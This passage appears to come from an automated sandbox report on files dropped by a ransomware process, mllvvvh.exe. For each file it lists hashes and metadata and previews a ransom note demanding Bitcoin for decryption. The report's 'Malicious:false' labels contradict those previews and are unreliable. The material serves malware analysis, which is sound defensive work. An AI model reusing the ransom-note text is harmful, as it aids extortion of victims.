                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
